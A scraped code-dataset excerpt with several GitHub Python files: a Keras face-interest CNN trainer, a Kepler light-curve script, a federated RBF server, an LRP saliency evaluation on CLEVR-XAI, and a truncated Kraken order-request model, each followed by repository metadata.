20501710133 | from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, ReduceLROnPlateau
from tensorflow.keras import layers, models
from tensorflow import lite
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import os
import time
import cv2
import datetime
# КОНФИГУРАЦИЯ НЕЙРОННОЙ СЕТИ
def get_model(input_size, classes=7):
model = models.Sequential()
model.add(layers.Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape =input_size))
model.add(layers.Conv2D(64, kernel_size=(3, 3), activation='relu', padding='same'))
model.add(layers.BatchNormalization())
model.add(layers.MaxPooling2D(2, 2))
model.add(layers.Dropout(0.25))
model.add(layers.Conv2D(128, kernel_size=(3, 3), activation='relu', padding='same', kernel_regularizer=regularizers.l2(0.01)))
model.add(layers.Conv2D(256, kernel_size=(3, 3), activation='relu', kernel_regularizer=regularizers.l2(0.01)))
model.add(layers.BatchNormalization())
model.add(layers.MaxPooling2D(pool_size=(2, 2)))
model.add(layers.Dropout(0.25))
model.add(layers.Flatten())
model.add(layers.Dense(1024, activation='relu'))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(classes, activation='softmax'))
# компиляция модели
model.compile(optimizer=Adam(learning_rate=0.0001),
loss='categorical_crossentropy',
metrics=['accuracy'])
return model
# ЗАГРУЗКА И ПРЕОБРАЗОВАНИЕ ИЗОБРАЖЕНИЙ
def dataset_load(im_paths, width, height, verbose):
data = []
labels = []
for (i, im_path) in enumerate(im_paths):
# загружаем изображение в переменную image
image = cv2.imread(im_path)
# определяем класс изображения из строки пути
# формат пути: ../dataset/{class}/{image}.jpg
label = im_path.split(os.path.sep)[-2]
# изменяем размер изображения на заданный (изображение должно быть квадратным)
image = cv2.resize(image, (width, height), interpolation=cv2.INTER_AREA)
# переводим изображение в массив numpy
image_array = img_to_array(image, data_format=None)
# добавляем массив изображения в список data
data.append(image_array)
# добавляем в список labels метку соответствующего изображения из списка data
labels.append(label)
# выводим на экран количество обработанных изображений в периодичностью verbose
if verbose > 0 and i > 0 and (i + 1) % verbose == 0:
print("[INFO] Обработано {}/{}".format(i + 1, len(im_paths)))
# возвращаем numpy массивы data и labels
return (np.array(data), np.array(labels))
# 1. ПОДГОТОВКА ДАННЫХ
# указываем название каталога набора данных в папке datasets
dataset_name = "faces"
# определяем пути набора данных, сохранения графика обучения и модели нейронной сети keras
dataset_path = os.path.join("datasets", dataset_name)
name_labels = ['interested', 'uninterested']
num_classes = len(name_labels)
plot_name = "{}_output/{}_plot.png".format(dataset_name, dataset_name)
weights_name = "{}_output/{}_weights.h5".format(dataset_name, dataset_name)
tflite_name = "{}_output/{}_weights.tflite".format(dataset_name, dataset_name)
# загружаем набор данных с диска, преобразуя изображения в массив
# и масштабируя значения пикселей из диапазона [0, 255] в диапазон [0, 1]
start_time = time.time()
image_paths = list(paths.list_images(dataset_path))
print("[INFO] Загрузка изображений ...")
(data, labels) = dataset_load(image_paths, width=48, height=48, verbose=500)
data = data.astype("float") / 255.0
# разделяем данные на обучающий и тестовый наборы (75% и 25%)
(trainX, testX, trainY, testY) = train_test_split(data, labels, test_size=0.25, random_state=42)
print("[INFO] Форма матрицы признаков: {}".format(data.shape))
print("[INFO] Размер матрицы признаков: {:.1f}MB".format(data.nbytes / (1024 * 1000.0)))
# преобразуем метки из целых чисел в векторы
trainY = LabelBinarizer().fit_transform(trainY)
testY = LabelBinarizer().fit_transform(testY)
print("[INFO] Время подготовки данных: {} сек".format(round(time.time() - start_time, 2)))
# 2.СБОРКА И КОМПИЛЯЦИЯ МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Компиляция модели...")
model = get_model((48,48,1), 2)
# 3.ФОРМИРОВАНИЕ ДОПОЛНИТЕЛЬНЫХ ПАРАМЕТРОВ ОБУЧЕНИЯ
# Определение коллбэков для обучения нейронной сети
log_dir = "checkpoint/logs/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
checkpoint = ModelCheckpoint(filepath=weights_name,
save_best_only=True,
verbose=1,
mode='min',
moniter='val_loss')
reduce_lr = ReduceLROnPlateau(monitor='val_loss',
factor=0.2,
patience=6,
verbose=1,
min_delta=0.0001)
tensorboard_callback = TensorBoard(log_dir=log_dir, histogram_freq=1)
csv_logger = CSVLogger('training.log')
callbacks = [checkpoint, reduce_lr, csv_logger]
# настройка метода увеличения выборки данных для обучения через модификацию существующих данных (аугментация)
aug = ImageDataGenerator(rotation_range=20, zoom_range=0.15,
width_shift_range=0.2, height_shift_range=0.2,
shear_range=0.15, horizontal_flip=True, fill_mode="nearest")
# 4. ОБУЧЕНИЕ НЕЙРОННОЙ СЕТИ
num_epochs = 30
print("[INFO] Обучение нейронной сети...")
start_time = time.time()
hist = model.fit(aug.flow(trainX, trainY, batch_size=32),
validation_data=(testX, testY),
batch_size=64,
epochs=num_epochs,
callbacks=callbacks,
verbose=0)
print("[INFO] Время обучения: {} сек".format(round(time.time() - start_time, 2)))
# 5.ОЦЕНКА МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Оценка нейронной сети...")
predictions = model.predict(testX, batch_size=32)
print(classification_report(testY.argmax(axis=1),
predictions.argmax(axis=1),
target_names=name_labels))
# построение и сохранение графика потерь и точности тренировок
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, num_epochs), hist.history["loss"], label="train_loss")
plt.plot(np.arange(0, num_epochs), hist.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, num_epochs), hist.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, num_epochs), hist.history["val_accuracy"], label="val_acc")
plt.title("Training Loss and Accuracy")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend()
plt.savefig(plot_name)
# 6. СОХРАНЕНИЕ МОДЕЛИ НЕЙРОННОЙ СЕТИ
print("[INFO] Сохранение модели TFLite с квантованием...")
# конвертирование модели keras в квантованную модель tflite
converter = lite.TFLiteConverter.from_keras_model(model)
converter.optimizations = [lite.Optimize.DEFAULT]
tflite_model = converter.convert()
# сохранение модели tflite.
with open(tflite_name, 'wb') as f:
f.write(tflite_model)
| aleksioprime/facerecognition | training_cnn.py | training_cnn.py | py | 8,710 | python | ru | code | 0 | github-code | 6 | [
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.models",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "tensorflow.keras.layers.Conv2D",
"line_number": 23,
"usage_type": "call"
},
... |
1501952186 | from numpy import *
import matplotlib.pyplot as plt
import functions
data = loadtxt("kplr006603043-2011145075126_slc.tab")
data_new = []
for i in data:
if i[0] > 1691.5 and i[0] < 1693.1:
data_new.append(i)
data = array(data_new)
mag = data[:,3]
flux = 10**((mag-median(mag))/-2.5)
o = open("lc2.dat","w")
output = [data[:,0],flux,data[:,4]]
output = transpose(output)
functions.write_table(output,o)
o.close()
plt.scatter(data[:,0],flux)
plt.show()
| chelseah/LCFIT | primitive_lcfit_scripts/data/formatlc.py | formatlc.py | py | 467 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "functions.write_table",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "mat... |
8397560124 | import copy
import numpy as np
from scipy.spatial.distance import cdist
class Server:
def __init__(self, parameters):
super().__init__()
self.k = parameters['kernel_size']
self.alpha = 1.0
self.d_out = parameters['d_out']
# centers, spreads, w and b can be broadcast to clients
self.centers, self.std = None, None
self.w = np.random.randn(self.k, self.d_out)
self.b = np.random.randn(1, self.d_out)
@staticmethod
def _sort_centers(centers):
"""
To sort the centers according to the distance from zero vector
Please note that this fun has not consider the direction of the centers, should be change
:param centers:
:return: sorted centers & index
"""
tmp_centers = copy.deepcopy(centers)
distance = np.sum(tmp_centers ** 2, axis=1)
sorted_index = np.argsort(distance)
tmp_centers = tmp_centers[sorted_index, :]
return tmp_centers, sorted_index
@staticmethod
def _dist(Mat1, Mat2):
"""
rewrite euclidean distance function in Matlab: dist
:param Mat1: matrix 1, M x N
:param Mat2: matrix 2, N x R
output: Mat3. M x R
"""
Mat2 = Mat2.T
return cdist(Mat1, Mat2)
def average(self, selected_clients):
stack_c, stack_w, stack_b, stack_s = [], [], [], []
num_data = 0
for i, client in enumerate(selected_clients):
tmp_c, tmp_w, tmp_b, tmp_s = client.compute_update()
nk = client.data_size()
num_data += nk
if i == 0:
stack_c, stack_w, stack_b, stack_s = nk * tmp_c, nk * tmp_w, \
nk * tmp_b, nk * tmp_s
else:
# stack_c = np.vstack((stack_c, tmp_c))
stack_c += nk * tmp_c
stack_w += nk * tmp_w
stack_b += nk * tmp_b
stack_s += nk * tmp_s
# k_means_c = KMeans(n_clusters=self.k).fit(stack_c)
# self.centers = k_means_c.cluster_centers_
self.centers = stack_c / num_data
self.centers, tmp_index = self._sort_centers(self.centers)
# self.w, self.b, self.std = stack_w / num_data, stack_b / num_data, stack_s / num_data
self.w, self.b, self.std = stack_w[tmp_index] / num_data, stack_b / num_data, stack_s[tmp_index] / num_data
def predict(self, test_x):
N = test_x.shape[0]
TestDistance = self._dist(self.centers, test_x.T)
TestSpreadMat = np.tile(self.std.reshape(-1, 1), (1, N))
TestHiddenOut = np.exp(-(TestDistance / TestSpreadMat) ** 2).T
Test_y = np.dot(TestHiddenOut, self.w) + self.b
return Test_y
def broadcast(self):
    """Package deep copies of the global model parameters for clients.

    Deep copies prevent clients from mutating the server-side arrays.

    :return: dict with keys 'centers', 'w', 'b' and 'std'.
    """
    return {
        'centers': copy.deepcopy(self.centers),
        'w': copy.deepcopy(self.w),
        'b': copy.deepcopy(self.b),
        'std': copy.deepcopy(self.std),
    }
| VeritasXu/FDD-EA | libs/Server.py | Server.py | py | 3,052 | python | en | code | 7 | github-code | 6 | [
{
"api_name": "numpy.random.randn",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.randn",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
36646568157 | """Evaluate explanation technique on the CLEVR XAI dataset.
This module computes the saliency maps for the relation network
and evaluates how well the explanation technique matches the
ground truth heatmaps.
"""
# from lrp_relations import enable_deterministic # noqa isort:skip
import dataclasses
import pickle
from typing import Optional, cast
import numpy as np
import pandas as pd
import savethat
import torch
from savethat import logger
from torch.utils.data import DataLoader
from tqdm import tqdm
from lrp_relations import data, lrp, train_clevr
from relation_network import model as rel_model
@dataclasses.dataclass(frozen=True)
class GroundTruthEvalArgs(savethat.Args):
    # Storage key of the trained relation-network run to evaluate.
    model_key: str
    # Root directory of the CLEVR dataset.
    dataset: str = "../data/clevr/CLEVR_v1.0/"
    question_type: str = "simple"  # "simple" or "complex"
    ground_truth: str = "single_object"  # "single_object" or "all_objects"
    n_samples: int = -1  # -1 for all samples
    device: str = "cuda" if torch.cuda.is_available() else "cpu"
    batch_size: int = 50
    # "best" resolves to the last recorded checkpoint; any other value is
    # used as a literal checkpoint filename (see load_model).
    checkpoint: str = "best"
@dataclasses.dataclass(frozen=True)
class GroundTruthEvalResults:
    """Per-sample evaluation metrics collected over the CLEVR-XAI data."""

    relevance_mass: torch.Tensor
    relevance_rank_accuracy: torch.Tensor
    correct: torch.Tensor

    def as_dataframe(self) -> pd.DataFrame:
        """Return the two per-sample metrics as a dataframe."""
        columns = {
            "relevance_mass": self.relevance_mass.cpu().numpy(),
            "relevance_rank_accuracy": self.relevance_rank_accuracy.cpu().numpy(),
        }
        return pd.DataFrame(columns)

    def accuracy(self) -> float:
        """Fraction of samples the model classified correctly."""
        return self.correct.float().mean().item()
def load_model(
    storage: savethat.Storage,
    key: str,
    checkpoint: str = "best",
    map_location: Optional[torch.device] = None,
) -> tuple[rel_model.RelationNetworks, train_clevr.TrainArgs]:
    """Load a trained relation network and its training args from storage.

    Args:
        storage: Storage to load the model from.
        key: Key of the run to load (downloaded first if not present).
        checkpoint: "best" selects the last checkpoint recorded in
            ``results.pickle``; any other value is used as a checkpoint
            filename.
        map_location: Device mapping forwarded to ``torch.load``.

    Returns:
        The model and the arguments it was trained with.
    """
    run_dir = storage / key
    if not run_dir.exists():
        storage.download(key)
    if checkpoint == "best":
        with open(run_dir / "results.pickle", "rb") as f:
            trained = cast(train_clevr.TrainedModel, pickle.load(f))
        best_ckpt = trained.checkpoints[-1]
        ckpt_path = run_dir / "checkpoints" / best_ckpt.path
        logger.debug(
            f"Loading model with accuracy {best_ckpt.accuracy:.4f} from {ckpt_path}"
        )
    else:
        ckpt_path = run_dir / "checkpoints" / checkpoint
        logger.debug(f"Loading model from {ckpt_path}")
    model = rel_model.RelationNetworks(data.get_n_words())
    model.load_state_dict(torch.load(ckpt_path, map_location=map_location))
    args = train_clevr.TrainArgs.from_json(run_dir / "args.json")
    return model, args
def relevance_mass(
    saliency: torch.Tensor,
    mask: torch.Tensor,
    reduce: tuple[int, ...] = (1, 2, 3),
) -> torch.Tensor:
    """Fraction of total saliency that falls inside the ground-truth mask.

    Args:
        saliency: Saliency map.
        mask: Ground-truth mask, multiplied elementwise with the saliency.
        reduce: Dimensions summed over (default: everything but the batch).

    Returns:
        Per-sample ratio of masked saliency to total saliency.
    """
    masked_sum = (mask * saliency).sum(dim=reduce)
    total_sum = saliency.sum(dim=reduce)
    return masked_sum / total_sum
def l2_norm_sq(x: torch.Tensor, dim: int = 1) -> torch.Tensor:
    """Squared L2 norm of ``x`` along ``dim``.

    Args:
        x: Input tensor.
        dim: Dimension to reduce (kept with size 1).

    Returns:
        The squared L2 norm, with ``dim`` retained.
    """
    return x.pow(2).sum(dim, keepdim=True)
def max_norm(x: torch.Tensor, dim: int = 1) -> torch.Tensor:
    """Compute the max (Chebyshev) norm of ``x`` along ``dim``.

    Args:
        x: Tensor to compute the max norm of.
        dim: Dimension to reduce (kept with size 1).

    Returns:
        The per-slice maximum absolute value.
    """
    # Renamed the local from `max` so it no longer shadows the builtin.
    largest, _ = x.abs().max(dim, keepdim=True)
    return largest
# -----------------------------------------------------------------------------
# Functions for computing the relevance rank accuracy
# copied from IBA code ;)
def to_index_map(hmap: np.ndarray) -> np.ndarray:
    """Return a map where each pixel holds its (negated) rank by value.

    The highest-valued pixel gets 0, the second highest -1, and so on.
    """
    rank_map = np.zeros_like(hmap, dtype=np.int64)
    for rank, pixel in enumerate(to_index_list(hmap)):
        rank_map[pixel] = -rank
    return rank_map


def to_index_list(
    hmap: np.ndarray, reverse: bool = False
) -> list[tuple[np.ndarray]]:
    """Return the pixel indices of ``hmap`` sorted by value.

    Highest-valued pixel first; ``reverse`` flips to lowest-first.
    """
    flat_order = np.argsort((hmap if reverse else -hmap).ravel())
    # Tuple of per-axis index arrays -> (size, ndim) array of coordinates.
    unraveled = np.unravel_index(flat_order, hmap.shape)
    coords = np.transpose(np.stack(unraveled))
    return [tuple(c) for c in coords]  # type: ignore
def get_ration_in_mask(heatmap: np.ndarray, mask: np.ndarray) -> float:
    """Relevance rank accuracy: fraction of the top-n heatmap pixels that
    fall inside the ground-truth mask, where n is the number of mask pixels.

    Args:
        heatmap: 2d saliency map.
        mask: 2d ground-truth mask; values > 0.5 count as inside.

    Returns:
        Ratio in [0, 1].

    Raises:
        ValueError: if an input is not 2d or the shapes differ.
    """
    if mask.ndim != 2:
        raise ValueError("Expected 2 dimensions")
    if heatmap.ndim != 2:
        raise ValueError("Expected 2 dimensions")
    if mask.shape != heatmap.shape:
        raise ValueError("Shapes must match")
    # Rank map: highest heatmap pixel -> 0, next -> -1, ...
    heatmap_idxs = to_index_map(heatmap).astype(np.int64)
    mask_np = mask > 0.5
    # Push pixels outside the mask to the lowest rank so they cannot be
    # counted among the top-n below.
    heatmap_bbox_idxs = heatmap_idxs.copy()
    heatmap_bbox_idxs[mask_np == 0] = heatmap_idxs.min()
    n_pixel_in_mask = mask_np.sum()
    # n_pixel_in_mask is already a scalar; the original divided by
    # n_pixel_in_mask.sum(), a redundant no-op that is dropped here.
    return float((heatmap_bbox_idxs > (-n_pixel_in_mask)).sum() / n_pixel_in_mask)
class GroundTruthEval(
    savethat.Node[GroundTruthEvalArgs, GroundTruthEvalResults]
):
    """Score LRP saliency maps of a relation network against the CLEVR-XAI
    ground-truth masks (relevance mass and relevance rank accuracy).
    """

    def _run(self):
        # Restore the trained model on the requested device and wrap it
        # with the LRP view used to produce saliency maps.
        device = torch.device(self.args.device)
        model, model_args = load_model(
            self.storage,
            self.args.model_key,
            self.args.checkpoint,
            map_location=device,
        )
        model.to(device)
        lrp_model = lrp.LRPViewOfRelationNetwork(model)
        lrp_model.to(device)
        # CLEVR-XAI yields (image, question, q_len, answer, gt-mask) tuples.
        dataset = data.CLEVR_XAI(
            self.args.dataset,
            self.args.question_type,
            self.args.ground_truth,
            model_args.reverse_question,
            use_preprocessed=True,
        )
        if self.args.n_samples == -1:
            n_samples = len(dataset)
        else:
            n_samples = self.args.n_samples
        loader = DataLoader(
            dataset,
            batch_size=self.args.batch_size,
            shuffle=False,  # keep sample order deterministic
            num_workers=1,
            pin_memory=False,
            collate_fn=dataset.collate_data,
        )
        # mse = 0
        pbar = tqdm(loader)
        rel_mass = []  # per-sample relevance mass
        rel_rank = []  # per-sample relevance rank accuracy
        total_samples = 0
        correct = []  # per-sample classification correctness
        for i, (image, question, q_len, answer, gt) in enumerate(pbar):
            # NOTE(review): `>` lets one extra batch through when n_samples
            # is not a multiple of batch_size — confirm this is intended.
            if i > n_samples // self.args.batch_size:
                break
            image, question, answer, gt = (
                image.to(device),
                question.to(device),
                answer.to(device),
                gt.to(device),
            )
            # Saliency is computed w.r.t. the ground-truth answer class.
            saliency, logits = lrp_model.get_lrp_saliency_and_logits(
                image,
                question,
                q_len,
                target=answer,
                normalize=False,
            )
            correct.append((logits.argmax(1) == answer).cpu())
            # Relevance mass: share of squared-L2 saliency inside the mask.
            rel_mass.append(
                relevance_mass(l2_norm_sq(saliency), gt).detach().cpu()
            )
            # Relevance rank accuracy, computed per sample on the max-norm
            # channel reduction of the saliency map.
            ranks = [
                get_ration_in_mask(
                    max_norm(s, dim=0).cpu().detach().numpy()[0],
                    gt_mask.cpu().detach().numpy()[0],
                )
                for gt_mask, s in zip(gt, saliency)
            ]
            rel_rank.append(torch.tensor(ranks).cpu())
            total_samples += len(image)
        res = GroundTruthEvalResults(
            relevance_mass=torch.cat(rel_mass),
            relevance_rank_accuracy=torch.cat(rel_rank),
            correct=torch.cat(correct),
        )
        # Print a human-readable summary before returning the result object.
        print("-" * 80)
        print(f"Statistics on {total_samples} samples:")
        print(res.as_dataframe().describe())
        print("-" * 80)
        print(f"Accuracy: {res.accuracy():.4f}")
        print("-" * 80)
        return res
| berleon/A-Rigorous-Study-Of-The-Deep-Taylor-Decomposition | lrp_relations/gt_eval.py | gt_eval.py | py | 8,038 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "savethat.Args",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "dataclasse... |
3989607811 | from typing import Any, Dict, List, Self, Union
from attrs import define as _attrs_define
from attrs import field as _attrs_field
from ..constants.trading import (
ConditionalCloseOrderType,
OrderType,
SelfTradePreventionStrategy,
TimeInForce,
Trigger,
TypeOrder,
)
from ..security import get_nonce
from ..types import UNSET, Unset
@_attrs_define
class AddStandardOrderRequestBody:
    """
    Attributes:
        nonce (int): Nonce used in construction of `API-Sign` header. Default `../security.get_nonce`
        ordertype (OrderType): Order type
        type (TypeOrder): Order direction (buy/sell)
        volume (str): Order quantity in terms of the base asset
            > Note: Volume can be specified as `0` for closing margin orders to automatically fill the requisite quantity.
        pair (str): Asset pair `id` or `altname`
        userref (Union[Unset, int]): User reference id
            `userref` is an optional user-specified integer id that can be associated with any number of orders. Many
            clients choose a `userref` corresponding to a unique integer id generated by their systems (e.g. a timestamp).
            However, because we don't enforce uniqueness on our side, it can also be used to easily group orders by pair,
            side, strategy, etc. This allows clients to more readily cancel or query information about orders in a
            particular group, with fewer API calls by using `userref` instead of our `txid`, where supported.
        displayvol (Union[Unset, str]): Used to create an iceberg order, this is the visible order quantity in terms of
            the base asset. The rest of the order will be hidden, although the full `volume` can be filled at any time by
            any order of that size or larger that matches in the order book. `displayvol` can only be used with the `limit`
            order type, must be greater than `0`, and less than `volume`.
        price (Union[Unset, str]): Price:
            * Limit price for `limit` orders
            * Trigger price for `stop-loss`, `stop-loss-limit`, `take-profit` and `take-profit-limit` orders
        price2 (Union[Unset, str]): Secondary Price:
            * Limit price for `stop-loss-limit` and `take-profit-limit` orders
            > Note: Either `price` or `price2` can be preceded by `+`, `-`, or `#` to specify the order price as an offset
            relative to the last traded price. `+` adds the amount to, and `-` subtracts the amount from the last traded
            price. `#` will either add or subtract the amount to the last traded price, depending on the direction and order
            type used. Relative prices can be suffixed with a `%` to signify the relative amount as a percentage.
        trigger (Union[Unset, Trigger]): Price signal used to trigger `stop-loss`, `stop-
            loss-limit`, `take-profit` and `take-profit-limit` orders
            > Note: This `trigger` type will as well be used for associated conditional close orders.
            Default: Trigger.LAST.
        leverage (Union[Unset, str]): Amount of leverage desired (default: none)
        reduce_only (Union[Unset, bool]): If `true`, order will only reduce a currently open position, not increase it
            or open a new position.
        stptype (Union[Unset, SelfTradePreventionStrategy]): Self trade prevention behavior definition:
            * cancel-newest - if self trade is triggered, arriving order will be canceled
            * cancel-oldest - if self trade is triggered, resting order will be canceled
            * cancel-both - if self trade is triggered, both arriving and resting orders will be canceled
            Default: SelfTradePreventionStrategy.CANCEL_NEWEST.
        oflags (Union[Unset, str]): Comma delimited list of order flags
            * `post` post-only order (available when ordertype = limit)
            * `fcib` prefer fee in base currency (default if selling)
            * `fciq` prefer fee in quote currency (default if buying, mutually exclusive with `fcib`)
            * `nompp` disable [market price protection](https://support.kraken.com/hc/en-us/articles/201648183-Market-
            Price-Protection) for market orders
            * `viqc` order volume expressed in quote currency. This is supported only for market orders.
        timeinforce (Union[Unset, TimeInForce]): Time-in-force of the order to specify how
            long it should remain in the order book before being cancelled. GTC (Good-'til-cancelled) is default if the
            parameter is omitted. IOC (immediate-or-cancel) will immediately execute the amount possible and cancel any
            remaining balance rather than resting in the book. GTD (good-'til-date), if specified, must coincide with a
            desired `expiretm`.
            Default: TimeInForce.GTC.
        starttm (Union[Unset, str]): Scheduled start time, can be specified as an absolute timestamp or as a number of
            seconds in the future:
            * `0` now (default)
            * `<n>` = unix timestamp of start time
            * `+<n>` = schedule start time `<n>` seconds from now
            * Note that URL encoding of the `+` character changes it to a space, so please use `%2b` followed by the
            number of seconds instead of `+`
        expiretm (Union[Unset, str]): Expiration time, also can be specified as an absolute timestamp or as a number of
            seconds in the future:
            * `0` no expiration (default)
            * `<n>` = unix timestamp of expiration time
            * `+<n>` = expire `<n>` seconds from now, minimum 5 seconds
            * Note that URL encoding of the `+` character changes it to a space, so please use `%2b` followed by the
            number of seconds instead of `+`
        closeordertype (Union[Unset, ConditionalCloseOrderType]): Conditional close order type
            > Note: [Conditional close orders](https://support.kraken.com/hc/en-us/articles/360038640052-Conditional-Close)
            are triggered by execution of the primary order in the same quantity and opposite direction, but once triggered
            are __independent orders__ that may reduce or increase net position
        closeprice (Union[Unset, str]): Conditional close order `price`
        closeprice2 (Union[Unset, str]): Conditional close order `price2`
        deadline (Union[Unset, str]): RFC3339 timestamp (e.g. 2021-04-01T00:18:45Z) after which the matching engine
            should reject the new order request, in presence of latency or order queueing: min now() + 2 seconds, max now()
            + 60 seconds.
        validate (Union[Unset, bool]): Validate inputs only. Do not submit order.
    """

    # Required fields (no default).
    ordertype: OrderType
    type: TypeOrder
    volume: str
    pair: str
    # NOTE(review): this default is evaluated once at class-definition time,
    # so every instance created without an explicit nonce shares the same
    # value — confirm intended; an attrs factory would regenerate it per
    # instance.
    nonce: int = get_nonce()
    # Optional fields: UNSET sentinels are omitted by to_dict().
    userref: Union[Unset, int] = UNSET
    displayvol: Union[Unset, str] = UNSET
    price: Union[Unset, str] = UNSET
    price2: Union[Unset, str] = UNSET
    trigger: Union[Unset, Trigger] = Trigger.LAST
    leverage: Union[Unset, str] = UNSET
    reduce_only: Union[Unset, bool] = False
    stptype: Union[
        Unset, SelfTradePreventionStrategy
    ] = SelfTradePreventionStrategy.CANCEL_NEWEST
    oflags: Union[Unset, str] = UNSET
    timeinforce: Union[Unset, TimeInForce] = TimeInForce.GTC
    starttm: Union[Unset, str] = UNSET
    expiretm: Union[Unset, str] = UNSET
    closeordertype: Union[Unset, ConditionalCloseOrderType] = UNSET
    closeprice: Union[Unset, str] = UNSET
    closeprice2: Union[Unset, str] = UNSET
    deadline: Union[Unset, str] = UNSET
    validate: Union[Unset, bool] = False
    # Catch-all for keys not covered by the declared fields.
    additional_properties: Dict[str, Any] = _attrs_field(init=False, factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a request dict, omitting UNSET optional fields.

        Enum values are unwrapped to their raw values; conditional-close
        fields are emitted under Kraken's ``close[...]`` key names.
        """
        nonce = self.nonce
        ordertype = self.ordertype.value
        type = self.type.value
        volume = self.volume
        pair = self.pair
        userref = self.userref
        displayvol = self.displayvol
        price = self.price
        price2 = self.price2
        trigger: Union[Unset, str] = UNSET
        if not isinstance(self.trigger, Unset):
            trigger = self.trigger.value
        leverage = self.leverage
        reduce_only = self.reduce_only
        stptype: Union[Unset, str] = UNSET
        if not isinstance(self.stptype, Unset):
            stptype = self.stptype.value
        oflags = self.oflags
        timeinforce: Union[Unset, str] = UNSET
        if not isinstance(self.timeinforce, Unset):
            timeinforce = self.timeinforce.value
        starttm = self.starttm
        expiretm = self.expiretm
        closeordertype: Union[Unset, str] = UNSET
        if not isinstance(self.closeordertype, Unset):
            closeordertype = self.closeordertype.value
        closeprice = self.closeprice
        closeprice2 = self.closeprice2
        deadline = self.deadline
        validate = self.validate
        field_dict: Dict[str, Any] = {}
        # Additional properties first so declared fields take precedence.
        field_dict.update(self.additional_properties)
        field_dict.update(
            {
                "nonce": nonce,
                "ordertype": ordertype,
                "type": type,
                "volume": volume,
                "pair": pair,
            }
        )
        if userref is not UNSET:
            field_dict["userref"] = userref
        if displayvol is not UNSET:
            field_dict["displayvol"] = displayvol
        if price is not UNSET:
            field_dict["price"] = price
        if price2 is not UNSET:
            field_dict["price2"] = price2
        if trigger is not UNSET:
            field_dict["trigger"] = trigger
        if leverage is not UNSET:
            field_dict["leverage"] = leverage
        if reduce_only is not UNSET:
            field_dict["reduce_only"] = reduce_only
        if stptype is not UNSET:
            field_dict["stptype"] = stptype
        if oflags is not UNSET:
            field_dict["oflags"] = oflags
        if timeinforce is not UNSET:
            field_dict["timeinforce"] = timeinforce
        if starttm is not UNSET:
            field_dict["starttm"] = starttm
        if expiretm is not UNSET:
            field_dict["expiretm"] = expiretm
        if closeordertype is not UNSET:
            field_dict["close[ordertype]"] = closeordertype
        if closeprice is not UNSET:
            field_dict["close[price]"] = closeprice
        if closeprice2 is not UNSET:
            field_dict["close[price2]"] = closeprice2
        if deadline is not UNSET:
            field_dict["deadline"] = deadline
        if validate is not UNSET:
            field_dict["validate"] = validate
        return field_dict

    @classmethod
    def from_dict(cls: type[Self], src_dict: Dict[str, Any]) -> Self:
        """Build an instance from a request dict.

        Recognized keys are popped off a copy of ``src_dict``; whatever
        remains is stored as ``additional_properties``.
        """
        d = src_dict.copy()
        nonce = d.pop("nonce", get_nonce())
        ordertype = OrderType(d.pop("ordertype"))
        type = TypeOrder(d.pop("type"))
        volume = d.pop("volume")
        pair = d.pop("pair")
        userref = d.pop("userref", UNSET)
        displayvol = d.pop("displayvol", UNSET)
        price = d.pop("price", UNSET)
        price2 = d.pop("price2", UNSET)
        _trigger = d.pop("trigger", UNSET)
        trigger: Union[Unset, Trigger]
        trigger = UNSET if isinstance(_trigger, Unset) else Trigger(_trigger)
        leverage = d.pop("leverage", UNSET)
        reduce_only = d.pop("reduce_only", UNSET)
        _stptype = d.pop("stptype", UNSET)
        stptype: Union[Unset, SelfTradePreventionStrategy]
        if isinstance(_stptype, Unset):
            stptype = UNSET
        else:
            stptype = SelfTradePreventionStrategy(_stptype)
        oflags = d.pop("oflags", UNSET)
        _timeinforce = d.pop("timeinforce", UNSET)
        timeinforce: Union[Unset, TimeInForce]
        if isinstance(_timeinforce, Unset):
            timeinforce = UNSET
        else:
            timeinforce = TimeInForce(_timeinforce)
        starttm = d.pop("starttm", UNSET)
        expiretm = d.pop("expiretm", UNSET)
        _closeordertype = d.pop("close[ordertype]", UNSET)
        closeordertype: Union[Unset, ConditionalCloseOrderType]
        if isinstance(_closeordertype, Unset):
            closeordertype = UNSET
        else:
            closeordertype = ConditionalCloseOrderType(_closeordertype)
        closeprice = d.pop("close[price]", UNSET)
        closeprice2 = d.pop("close[price2]", UNSET)
        deadline = d.pop("deadline", UNSET)
        validate = d.pop("validate", UNSET)
        add_standard_order_request_body = cls(
            nonce=nonce,
            ordertype=ordertype,
            type=type,
            volume=volume,
            pair=pair,
            userref=userref,
            displayvol=displayvol,
            price=price,
            price2=price2,
            trigger=trigger,
            leverage=leverage,
            reduce_only=reduce_only,
            stptype=stptype,
            oflags=oflags,
            timeinforce=timeinforce,
            starttm=starttm,
            expiretm=expiretm,
            closeordertype=closeordertype,
